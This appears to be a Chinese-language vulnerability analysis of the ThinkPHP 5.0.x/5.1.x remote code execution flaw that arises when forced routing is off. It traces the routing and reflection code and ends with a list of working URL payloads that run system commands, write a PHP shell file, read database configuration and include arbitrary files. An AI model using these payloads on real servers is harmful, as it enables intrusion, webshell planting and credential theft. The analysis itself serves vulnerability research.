前言
thinkphp下载
漏洞影响版本:
5.0.0<=ThinkPHP5<=5.0.23 、5.1.0<=ThinkPHP<=5.1.30
未开启强制路由导致RCE
搭建
tp版本:5.1.29
php版本:7.2.10(必须7以上)
测试:
http://www.yn8rt.com/thinkphp5.1.29/public/?s=index/think\request/input?data=whoami&filter=system
开始
据说这个漏洞的成因是因为未开启强制路由,因为兼容模式的存在才导致的rce,开始断电调试:
首先是get的作用:获取容器中的对象实例,应该意思差不多就是实例化一个对象
步过了,看一些run的函数:
主要就是这个路由检测,跟进后会得到,check函数:
通过这函数处理完了以后会将$url里面的/变为|
然后返回完了dispatch后,紧接着就进入了init函数:
跟进parseurl函数也就是解析作用:
这是其中有用的函数,应该就是得到模块控制器和操作,把他们存到一个数组中也就就是变量route,一步一步的步入你就知道了
跟进exec函数:
public function exec()
{
// 监听module_init
$this->app['hook']->listen('module_init');
try {
// 实例化控制器
$instance = $this->app->controller($this->controller,
$this->rule->getConfig('url_controller_layer'),
$this->rule->getConfig('controller_suffix'),
$this->rule->getConfig('empty_controller'));
if ($instance instanceof Controller) {
$instance->registerMiddleware();
}
} catch (ClassNotFoundException $e) {
throw new HttpException(404, 'controller not exists:' . $e->getClass());
}
$this->app['middleware']->controller(function (Request $request, $next) use ($instance) {
// 获取当前操作名
$action = $this->actionName . $this->rule->getConfig('action_suffix');
if (is_callable([$instance, $action])) {
// 执行操作方法
$call = [$instance, $action];
// 严格获取当前操作方法名
$reflect = new ReflectionMethod($instance, $action);
$methodName = $reflect->getName();
$suffix = $this->rule->getConfig('action_suffix');
$actionName = $suffix ? substr($methodName, 0, -strlen($suffix)) : $methodName;
$this->request->setAction($actionName);
// 自动获取请求变量
$vars = $this->rule->getConfig('url_param_type')
? $this->request->route()
: $this->request->param();
$vars = array_merge($vars, $this->param);
} elseif (is_callable([$instance, '_empty'])) {
// 空操作
$call = [$instance, '_empty'];
$vars = [$this->actionName];
$reflect = new ReflectionMethod($instance, '_empty');
} else {
// 操作不存在
throw new HttpException(404, 'method not exists:' . get_class($instance) . '->' . $action . '()');
}
$this->app['hook']->listen('action_begin', $call);
$data = $this->app->invokeReflectMethod($instance, $reflect, $vars);
return $this->autoResponse($data);
});
return $this->app['middleware']->dispatch($this->request, 'controller');
}
}
看他注释的严格获取当前操作方法名的地方,应该是利用了反射来得到方法里面具体的属性等,来进一步确定函数的名字等,其中有invokeReflectMethod(请求反射方法)比较关键:
步入到input函数:
跟踪查看一下原因:
是因为回调函数导致的rce
总结
整体思路:由于未强制开启路由,因为兼容模式的存在,使得我们传入的参数会被成功解析并调用:期间会在check方法中将斜杠/替换成|从而得到的$dispath值是index|think\request|input?data=whoami,相当于:目录名|控制器|方法?参数,以及最后导致的出问题的文件正think\request.php中,在其中的input方法中导致的RCE
payload
5.1.x
?s=index/think\Request/input&filter[]=system&data=dir
?s=index/think\template\driver\file/write&cacheFile=shell.php&content=<?php phpinfo();?>
?s=index/think\Container/invokefunction&function=call_user_func&vars[]=system&vars[]=dir
?s=index/think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
5.0.x
?s=index/think\config/get&name=database.username # 获取配置信息
?s=index/\think\Lang/load&file=../../test.jpg # 包含任意文件
?s=index/\think\Config/load&file=../../t.php # 包含任意.php文件
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id